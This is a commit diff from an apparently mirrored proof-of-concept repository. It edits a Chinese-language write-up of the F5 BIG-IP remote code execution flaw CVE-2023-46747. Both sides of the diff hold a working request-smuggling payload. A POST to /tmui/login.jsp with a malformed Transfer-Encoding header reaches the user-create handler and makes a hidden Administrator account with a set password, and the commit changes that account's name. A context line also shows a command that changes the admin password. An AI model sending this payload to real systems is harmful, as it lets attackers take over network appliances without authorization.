admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747).md

Browse Source
This commit is contained in:
wy876 2023-11-01 21:29:43 +08:00 committed by GitHub
parent c18e5496b4
commit f7ce69f5ce
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747).md
View File

@ -44,7 +44,7 @@ modify auth user admin password admin
当发送到F5 BIG-IP TMUI模块的请求例如登陆页面/tmui/login.jsp包含一个类似值为 "xxx, chunked" 的 "Transfer-Encoding" 头,并且请求体内容满足特定内容时,漏洞会被触发。 当发送到F5 BIG-IP TMUI模块的请求例如登陆页面/tmui/login.jsp包含一个类似值为 "xxx, chunked" 的 "Transfer-Encoding" 头,并且请求体内容满足特定内容时,漏洞会被触发。
&name=admin&name_before=&passwd=admin789456 参数填入账户密码 &name=adminqq&name_before=&passwd=admin789456 参数填入创建账户
``` ```
POST /tmui/login.jsp HTTP/1.1 POST /tmui/login.jsp HTTP/1.1
@ -54,7 +54,7 @@ Content-Type: application/x-www-form-urlencoded
204 204
HTTP/1.1/tmui/Control/form 127.0.0.1 localhost localhostP Tmui-Dubbuf BBBBBBBBBBB HTTP/1.1/tmui/Control/form 127.0.0.1 localhost localhostP Tmui-Dubbuf BBBBBBBBBBB
REMOTEROLE0<> localhostadminq_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=admin&name_before=&passwd=admin789456&passwd_before=&finished=x&finished_before=<3D> REMOTEROLE0<> localhostadminq_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=adminqq&name_before=&passwd=admin789456&passwd_before=&finished=x&finished_before=<3D>
0 0
``` ```